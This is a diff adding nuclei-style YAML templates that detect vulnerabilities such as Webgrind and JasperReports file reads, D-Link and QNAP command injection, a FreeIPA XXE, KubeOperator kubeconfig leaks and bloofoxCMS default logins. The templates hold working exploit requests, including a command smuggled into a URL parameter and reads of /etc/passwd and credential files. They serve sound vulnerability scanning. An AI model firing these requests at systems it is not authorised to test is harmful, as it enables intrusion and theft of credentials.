words: + - "text/plain" + - "USGSESSID=" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml new file mode 100644 index 0000000000..69c672ddcf --- /dev/null +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -0,0 +1,40 @@ +id: CVE-2018-12909 + +info: + name: Webgrind <= 1.5 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md + - https://github.com/jokkedk/webgrind/issues/112 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 + classification: + cve-id: CVE-2018-12909 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + verified: true + fofa-query: app="Webgrind" + tags: cve,cve2018,lfi,webgrind + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'webgrind' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml new file mode 100644 index 0000000000..a9e4221336 --- /dev/null +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-18809 + +info: + name: TIBCO JasperReports Library - Directory Traversal + author: DhiyaneshDK + severity: critical + description: | + The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + reference: + - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html + - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-18809 + classification: + cve-id: CVE-2018-18809 + metadata: + max-request: 1 + verified: true + shodan-query: html:"jasperserver-pro" + tags: cve,cve2018,lfi,kev,jasperserver,jasperreport + +http: + - method: GET + path: + - "{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "metadata.jdbc.driverClassName" + - "metadata.hibernate.dialect" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml new file mode 100644 index 0000000000..3207bc02d2 --- /dev/null +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-7653 + +info: + name: YzmCMS v3.6 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter. + reference: + - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + fofa-query: title="YzmCMS" + shodan-query: title:"YzmCMS" + tags: cve,cve2018,yzmcms,cms,xss + +http: + - method: GET + path: + - '{{BaseURL}}/index.php?m=search&c=index&a=initxqb4ncu9rs&modelid=1&q=tes' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'YzmCMS' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml new file mode 100644 index 0000000000..5f4cceb6f5 --- /dev/null +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-16057 + +info: + name: D-Link DNS-320 - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 + - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png + - https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16057 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: html:"ShareCenter" + tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=" + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains_all(body, "uid=", "gid=", "pwd&id") + condition: and diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml new file mode 100644 index 0000000000..c2d5e4242e --- /dev/null +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -0,0 +1,80 @@ +id: CVE-2019-7192 + +info: + name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 + - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html + - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7192 + cwe-id: CWE-863 + metadata: + max-request: 3 + verified: true + shodan-query: 'Content-Length: 580 "http server 1.0"' + tags: cve,cve2019,lfi,rce,kev,qnap,qts + +http: + - raw: + - | + POST /photo/p/api/album.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + a=setSlideshow&f=qsamplealbum + + - | + GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + POST /photo/p/api/video.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - "admin:.*:0:0:" + + - type: word + part: header_3 + words: + - video/subtitle + + - type: status + part: header_3 + status: + - 200 + + extractors: + - type: regex + name: album_id + part: body_1 + group: 1 + regex: + - '([a-zA-Z]+)<\/output>' + internal: true + + - type: regex + name: access_code + part: body_2 + group: 1 + regex: + - encodeURIComponent\('([A-Za-z0-9]+)'\) + internal: true diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 1baaecd50d..763520e60b 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -5,50 +5,10 @@ info: author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection - reference: - - "-" - - " " - - h - - t - - p - - s - - ":" - - / - - w - - i - - e - - r - - . - - c - - o - - m - - a - - n - - b - - u - - "1" - - "2" - - "4" - - "6" - - "8" - - "7" - - "3" - - "0" - - "9" - - "\n" - - y - - l - - g - - d - - v - - G - - H - - S - - L - - x - - C - - V - - E + reference: | + - https://twitter.com/iamnoooob/status/1246182773427240967 + - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype + - https://nvd.nist.gov/vuln/detail/CVE-2020-10199 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 38b6035e41..dfb849d2f5 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -4,10 +4,11 @@ info: name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery author: Suman_Kar severity: critical - description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. + description: | + Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. reference: - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24472 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -17,24 +18,24 @@ info: cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/qt-kentharadio" framework: wordpress vendor: qantumthemes product: kentharadio - tags: wordpress,lfi,ssrf,oast,wpscan,cve,cve2021 + tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021 http: - - raw: - - | - GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} + - method: GET + path: + - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me' matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" + - "

Interactsh Server

" - type: status status: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml new file mode 100644 index 0000000000..6fe2dd7f1e --- /dev/null +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-2414 + +info: + name: FreeIPA - XML Entity Injection + author: DhiyaneshDk + severity: high + description: | + Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + - https://github.com/dogtagpki/pki/pull/4021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-2414 + cwe-id: CWE-611 + metadata: + max-request: 1 + fofa-query: title="Identity Management" + shodan-query: title:"Identity Management" html:"FreeIPA" + verified: true + tags: cve,cve2022,dogtag,freeipa,xxe + +http: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + ]> + + + &ent; + + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "PKIException" + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 400 diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index cde7464471..c6e7c3148f 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml new file mode 100644 index 0000000000..73a5bcfb62 --- /dev/null +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-22478 + +info: + name: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access + author: DhiyaneshDk + severity: high + description: | + KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-22478 + - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-22478 + cwe-id: CWE-862 + metadata: + max-request: 1 + fofa-query: "kubepi" + shodan-query: html:"kubepi" + verified: true + tags: cve,cve2023,kubepi,k8s,exposure + +http: + - raw: + - | + @timeout 10 + POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {} + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"apiVersion":' + - '"uuid":' + - '"userName":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml new file mode 100644 index 0000000000..08aceb7382 --- /dev/null +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-22480 + +info: + name: KubeOperator Foreground `kubeconfig` - File Download + author: DhiyaneshDk + severity: critical + description: | + KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4. + reference: + - https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8 + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1 + - https://nvd.nist.gov/vuln/detail/CVE-2023-22480 + classification: + cve-id: CVE-2023-22480 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-863 + metadata: + max-request: 1 + verified: true + shodan-query: html:"KubeOperator" + fofa-query: app="KubeOperator" + tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/clusters/kubeconfig/k8s" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "apiVersion:" + - "clusters:" + condition: and + + - type: word + part: header + words: + - "application/download" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml new file mode 100644 index 0000000000..d3e5e67844 --- /dev/null +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-39120 + +info: + name: Nodogsplash - Directory Traversal + author: Numan Türle + severity: high + description: | + Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39120 + - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed + - https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6 + - https://github.com/openwrt/routing/pull/997 + remediation: Apply all relevant security patches and product upgrades. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-39120 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: title:"OpenWRT" + tags: cve,cve2023,lfi,openwrt,nodogsplash + +http: + - method: GET + path: + - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nodogsplash" + - "password" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml new file mode 100644 index 0000000000..4237c2a6c2 --- /dev/null +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-39143 + +info: + name: PaperCut < 22.1.3 - Path Traversal + author: pdteam + severity: critical + description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39143 + - https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/ + - https://www.papercut.com/kb/Main/securitybulletinjuly2023/ + - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H + cve-id: CVE-2023-39143 + cvss-score: 9.4 + epss-score: 0.00043 + metadata: + max-request: 1 + verified: true + shodan-query: html:"content="PaperCut"" + tags: cve,cve2023,lfi,papercut,kev + +http: + - method: GET + path: + - "{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png" + + matchers: + - type: dsl + dsl: + - content_length == 1655 + - status_code == 200 + - contains(to_lower(content_type), "image/png") + - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex + condition: and diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..41bf0fe859 --- /dev/null +++ b/http/default-logins/bloofoxcms-default-login.yaml @@ -0,0 +1,45 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 1 + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'text/html' + - 'index.php' + condition: and + + - type: status + status: + - 302 diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml new file mode 100644 index 0000000000..01deccb2ef --- /dev/null +++ b/http/exposed-panels/acenet-panel.yaml @@ -0,0 +1,28 @@ +id: acenet-panel + +info: + name: AceNet AceReporter Report Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: body="Login @ Reporter" + shodan-query: http.favicon.hash:-1595726841 + tags: panel,login,acenet,acereporter + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to Reporter' + - 'Login @ Reporter' + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml new file mode 100644 index 0000000000..9661c30661 --- /dev/null +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -0,0 +1,36 @@ +id: bloofoxcms-login-panel + +info: + name: bloofoxCMS Login Panel - Detect + author: theamanrawat + severity: info + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: panel,bloofox,cms + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/index.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bloofoxCMS - Home" + - "E-Mail / Username" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml new file mode 100644 index 0000000000..a8fe16d47f --- /dev/null +++ b/http/exposed-panels/discuz-panel.yaml @@ -0,0 +1,36 @@ +id: discuz-panel + +info: + name: Discuz Panel - Detection + author: ritikchaddha + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: panel,discuz,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'discuz_uid =' + - 'discuz' + - 'Powered by Discuz!' + - 'content="Discuz' + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'X([0-9.]+)<\/em><\/p>' diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml new file mode 100644 index 0000000000..3a31855628 --- /dev/null +++ b/http/exposed-panels/kodak-network-panel.yaml @@ -0,0 +1,26 @@ +id: kedacom-network-panel + +info: + name: Kedacom Network Keyboard Console Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: "网络键盘控制台" + verified: true + tags: panel,login,kedacom,network + +http: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + words: + - '网络键盘控制台' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml new file mode 100644 index 0000000000..d99769ae20 --- /dev/null +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -0,0 +1,26 @@ +id: mpsec-isg1000-panel + +info: + name: MPSec ISG1000 Security Gateway Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: "迈普通信技术股份有限公司" + verified: true + tags: panel,login,mpsec,isg1000 + +http: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + words: + - '/webui/images/maipu/login/' + + - type: status + status: + - 200 diff --git a/http/exposures/files/socks5-vpn-config.yaml b/http/exposures/files/socks5-vpn-config.yaml new file mode 100644 index 0000000000..92ad14ce27 --- /dev/null +++ b/http/exposures/files/socks5-vpn-config.yaml @@ -0,0 +1,40 @@ +id: socks5-vpn-config + +info: + name: Socks5 VPN - Sensitive File Disclosure + author: DhiyaneshDk + severity: high + description: | + Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 + metadata: + max-request: 1 + verified: true + fofa-query: app="惠尔顿-e地通VPN" + tags: esocks5,exposure,misconfig,files,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/backup/config.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "password=" + - "username=" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..e0469709f5 --- /dev/null +++ b/http/misconfiguration/bitbucket-auth-bypass.yaml @@ -0,0 +1,34 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: title="Log in - Bitbucket" + shodan-query: title:"Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml new file mode 100644 index 0000000000..853ee41f87 --- /dev/null +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -0,0 +1,37 @@ +id: casdoor-users-password + +info: + name: Casdoor get-users Account Password Disclosure + author: DhiyaneshDk + severity: high + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 + - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go + metadata: + max-request: 1 + verified: true + fofa-query: title="Casdoor" + tags: casdoor,exposure,misconfig,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/api/get-users?p=123&pageSize=123" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":' + - '"password":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml new file mode 100644 index 0000000000..a50cbcfda3 --- /dev/null +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -0,0 +1,38 @@ +id: clickhouse-unauth-api + +info: + name: ClickHouse API Database Interface - Improper Authorization + author: DhiyaneshDk + severity: high + reference: + - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 + metadata: + max-request: 1 + verified: true + shodan-query: "X-ClickHouse-Summary" + fofa-query: "X-ClickHouse-Summary" + tags: clickhouse,unauth,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/?query=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'default' + - 'system' + condition: and + + - type: word + part: header + words: + - 'text/tab-separated-values' + + - type: status + status: + - 200 diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml new file mode 100644 index 0000000000..7652815bd2 --- /dev/null +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -0,0 +1,37 @@ +id: yzmcms-installer + +info: + name: YzmCMS - Installer + author: ritikchaddha + severity: high + metadata: + max-request: 1 + verified: true + shodan-query: title:"YzmCMS" + fofa-query: title="YzmCMS" + tags: misconfig,yzmcms,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/application/install/index.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '安装程序 - YzmCMS' + - 'YzmCMS' + condition: or + + - type: word + part: body + words: + - '/index.php?step=2' + - '/install.css' + condition: or + + - type: status + status: + - 200 diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml new file mode 100644 index 0000000000..5289281ade --- /dev/null +++ 